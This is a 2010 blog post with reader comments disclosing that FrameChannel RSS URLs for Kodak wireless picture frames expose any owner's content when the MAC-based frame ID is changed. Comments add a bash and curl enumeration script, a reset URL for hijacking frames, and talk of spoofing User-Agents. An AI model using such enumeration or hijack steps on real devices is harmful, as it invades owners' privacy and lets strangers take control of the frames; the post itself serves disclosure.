Kodak Easyshare Wireless Picture Frame - How to show everyone whats on your frame

I recently purchased a Kodak Easyshare Wireless Digital Picture Frame off woot for an amazing price of $49.99. Infact, I bought two. The model number is W820, which is an 8″ frame, but there is also a 10 inch version as well. These picture frames have built in WiFi and can grab content off the internet.

The most exciting part about this picture frame has nothing to do with putting an SD card full of baby pictures, and everything to do with adding fun widgets to your photo roll! Facebook status updates, facebook photos, tweets, news, weather, live sports scores, flickr accounts, and the ability to have it make use nearly any RSS feed. Oh, and it shows baby pictures too I guess in the mix, if thats what you want.

The widgets are powered by FrameChannel, which is a sort of third party service that provides this functionality to Kodak picture frames everywhere. You setup an account with a special secret code that is shown on your picture frame (which nobody is supposed to have access to, otherwise they could load content on your frame before you even take it out of the box), and then you are off to widget building land where you can construct a slideshow based on time of day and frequency of display.

However, deep on the website i noticed this little innocent piece of information:

Advanced Settings

Advanced Settings

What’s this at the bottom? Some strange little RSS URL?

Well, lets just plug it in and see what happens:

http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:6D

Look, its an RSS feed of what my picture frame is showing now! I can send this nice URL to everyone I know so they can look at all my private content I have configured for this device. Now, under no circumstances would I recommend changing the last digits of this MAC address frame ID to another number….because you would get someone else’s picture frame content. Why would you want to do that?

UPDATE: 1/6/2010 It is quite apparent that FrameChannel is no longer interested in providing the public RSS feature to its customers. As other people have indicated, the RSS URL has been removed from the user interface. In addition, they are filtering by User-Agent. I am sure that will put an end to sharing of my RSS feed of my frame because User-Agents are impossible to fake. No word if they intend to update firmware for the “AVOS/1.1″-based device.

Slashdot has coined this feature documented on the web interface a “major privacy/security issue” and some discussion has ensued on the forum: http://yro.slashdot.org/story/10/01/05/0413228/Kodak-Wireless-Picture-Frames-Open-To-Public.

UPDATE: 6/21/2011 Regretfully, FrameChannel has informed its users that their year old WiFi internet-connected picture frame is now completely obsolete. With all these initiatives of putting everything in the cloud, I am sure we will see more of this crap.

Yeah, ‘due to the economy’, I may not be able to afford to store the kilobytes this blog post contains much longer. Maybe their economic challenges rest in the fact that there was no business model to begin with.

83 Responses to “Kodak Easyshare Wireless Picture Frame - How to show everyone whats on your frame”

  1. John says:

    Don’t forget that the first 6 nibbles of the mac address (3 bytes, the first 3 hex digits) will always be the same, just change the last 3 bytes. It would be trivial to write a script that did just this and returned which ones were valid URLs just based on the HTTP response code.

  2. Social comments and analytics for this post…

    This post was mentioned on Twitter by ry_jones: own a Kodak EasyShare frame? Might want to read this: your content is public. http://seattlewireless.net/~casey/?p=13...

  3. HKN says:

    Slashdot is coming!

    (counter is now 945)

  4. [...] Each frame’s URL is identical except for a parameter matching its particular MAC address, enabling public browsing of users’ feeds. And worse, if you reach the feed of a not-yet-activated frame, it gives you the code to activate [...]

  5. joker says:

    So… it looks like one could use this URL pattern to locate an unactivated frame and, as a courtesy to the purchaser, “pre-load” some pictures for them onto their frame?

    Wouldn’t that be a bit of a shock to granny when she unwraps the gift??

  6. joepress says:

    Better yet change one of the first three hex digits and you still get to create your own feed, it just won’t link up to a frame. COOL

  7. mike says:

    its even worse then you think, after reading your post i discovered that you can reset the key on arbitrary accounts… easily…

    lets just say “reset=1″ was not the brightest choice

  8. WizKid says:

    The activation image url also contains the MAC. And there is a parameter called reset=0. If reset=0 and I load the url for a MAC that is activated I get activation successful. But if I change to reset=1 I get an activation code. I haven’t tested if that activation code works. But I wouldn’t be surprised if it possible to reset someones frame.

  9. Bob says:

    Well, Kodak *does* call it EasyShare…..

  10. How nice that Kodak has made so Easy for you to ‘Share’, whether you want to or not.

  11. HappyHax0r says:

    It would seem that you don’t get much easier sharing than that? :)

  12. [...] Kodak Easyshare Wireless Picture Frame – How to show everyone whats on your frame « Casey Hal…. [...]

  13. Shawn says:

    Ah, this was just slashdotted - I am sorry but your screwed if you were thinking this was secure and safe in anyway!!

  14. Otto says:

    Don’t be too sure about the first three bytes of the MAC address not changing.

    I got two of these picture frames from Woot. Both Kodak. Both of them have characters other than the ones he posted in the link above.

    So, fiddling around with the real prefix, it took me a dozen tries before I found somebody else’s active feed. I know that this person lives in Milwaukee based on their weather feed. I know that they have two sons.

    One thing to keep in mind is that the photos that these things display tend to already be public. The Picasa connector only works with public photo albums. The Flickr connector has the same story. The Facebook connector can show private albums if you set it to do so, since it uses Facebook Connect to authenticate, but most of the others only work with public photos.

  15. Rob Weir says:

    I tried a few MAC addresses and soon found one that said:

    “This frame has been preactivated” and gave the username and password and invited the user to login to framechannel.com to upload their own content.

    So it appears that not only can one view their pictures, anyone also has public write access to their frame.

  16. Mike says:

    You can also deactivate frames by visiting
    http://www.framechannel.com/feeds/pair/index.php/r=1/frameModelCode=KD9371/frameModelId=1/frameId=whatever/reset=0/language=en

    You can then reactivate them and load them with whatever images you want.

    So Kodak has essentially built a system for letting complete strangers (a) browse your family photos, and (b) beam shock porn directly into your living-room?

  17. Mike says:

    Sorry, in the URL in my post the ‘reset=0′ should’ve been ‘reset=1′

  18. [...] there’s a problem with the Kodak Easyshare Wireless Picture [...]

  19. Johnny says:

    ….and the article is now also linked to Slashdot as well.

  20. [...] to a blog post by Casey Halverson, the wireless picture frame contents comes from a findable URL. It wouldn’t take a lot of technology to build software to search for the contents of other [...]

  21. illumin8 says:

    actually, changing 00:32 to 00:33 reveals a batch of unsold units. complete with activation codes.

  22. someone says:

    I’m pretty sure the fun has already started….

    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:1D

  23. [...] Kodak Easyshare Wireless Picture Frame – How to show everyone whats on your frame « Casey Hal…. [...]

  24. Ken says:

    I guess it’s really an Easy Share… you can share your pictures and access to your account with the world, effortlessly.

  25. Brian says:

    Problem with HTML response it seems they are all valid would have to trigger on something else should such a script be wanted.

    so this works
    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:6D
    as does this
    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:6z

  26. Parker says:

    This goes way beyond reasonable expectations of the vendor. Even the slightest interest in security/privacy would have prevented this. It’s entirely unforgivable. Lawsuit material.

    Has anyone notified Kodak or Framechannel.com? Looks like you have to create an account on framechannel.com to contact them. Maybe you should drop an email to
    info@framemedia.com

    $ whois framechannel.com

    Domain name: framechannel.com

    Administrative Contact:
    Frame Media, Inc.
    Alan Phillips (info@framemedia.com)
    +1.7812353006
    Fax:
    40 Washington St
    Wellesley, MA 02481
    US

  27. Joakim says:

    http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:B8:07:FF
    lol, now I really don’t imagine someone would put nude pictures of themselves on these… but Kodak and FrameChannel really have a privacy problem now and should be ashamed.

  28. Captain Obvious says:

    Two words “Easy” “Share”. Its in the title, why is everyone surprised? Good find though!

  29. Rick says:

    Your frame feed has the Slashdot summary that sent me here. If only the frame supported hyperlinks, you could complete the loop.

  30. Anonymous Coward says:

    Now, if it only had a built-in webcam… we’d really have something!

  31. tester says:

    Have fun.

    #!/bin/bash

    for ((a=184;a<=255;a++))
    do
    if [ $a -lt 16 ]
    then
    place1=$(echo “obase=16; $a” | bc)
    place1=0$place1
    else

    place1=$(echo “obase=16; $a” | bc)
    fi
    echo “first place $place1″

    for (( b=1; b<=255; b++ ))
    do
    if [ $b -lt 16 ]
    then
    place2=$(echo “obase=16; $b” | bc)
    place2=0$place2
    else

    place2=$(echo “obase=16; $b” | bc)
    fi
    echo ” second place $place2″

    for (( c=1; c> imagelist.txt

    echo ” Grabbing –frameId=00:23:4D:$place1:$place2:$place3 ”

    done
    done

    done

  32. tester says:

    curl -s http://rss.framechannel.com//productId=KD9371/frameId=00:23:4D:$place1:$place2:$place3 | grep jpg | grep media |cut -d”\”" -f”2″ >> imagelist.txt

  33. OBCENEIKON says:

    Did they already take it offline? It seems all macs are now showing the default image

  34. Ed says:

    Thank you for this post and information in the comments.
    We were literally setting one of these up today,
    for children/grandparents.

    Nice catch.

  35. AdaIsDead says:

    Looks like they are all on the National Geographic plants feed now, glad someone steped in…

  36. Jim says:

    It appears that FrameChannel is used by almost 2 dozen other digital picture frame vendors. Does anyone have experience with other similar products to know if they use the same RSS scheme and are equally vulnerable?

  37. JohnH says:

    I imagine all they have done is always give the default feed to a request from a User Agent in the HTTP request that doesn’t match the frame software’s user agent. If someone were to hook up a network sniffer and check a real frame’s HTTP request, and then set their user agent on their browser, I think you would once again see photos you are not supposed to see.

  38. Tester2 says:

    where did tester’s script go?! cease and desist order? :)

  39. [...] pictures of their choosing on it – even before it gets out of the box. Read the original post here. Kodak, you need to think the security implications of a wifi-enabled digital picture frame before [...]

  40. duncan says:

    All the URLs that are posted are all default pics, even the one someone said was NSFW. Could it be that they’ve taken action already?

  41. electronbee says:

    They are all saying forbidden now. I guess someone got around to pay attention!

  42. yyxy says:

    JohnH is almost certainly correct. Anyone willing to share a pcap?

  43. Jason! says:

    Since they’re not asking for a password, what are the odds they’re just checking the user agent string?

  44. KioskGuy says:

    Dang, i missed the fun. But this blog and those who were hacking the screens did the community a favor. A few days of foolishness has prompted Kodak and it’s vendors to take a closer look at the weakness of their programming team. Kudos. If they won’t do the QA work themselves, they can always crowdsource it.

  45. JohnH says:

    Did someone look to see what User-Agent string was being used by picture frames?

  46. KD9371 is dead says:

    So try some other product IDs. It looks like the quick and dirty hack was to disable product ID KD9371. Ultra-lame.

  47. Jeff says:

    That’s what I was thinking… anyone want to publish the frame browser’s user agent?

  48. [...] Kodak Easyshare Wireless Picture Frame – How to show everyone … [...]

Leave a Reply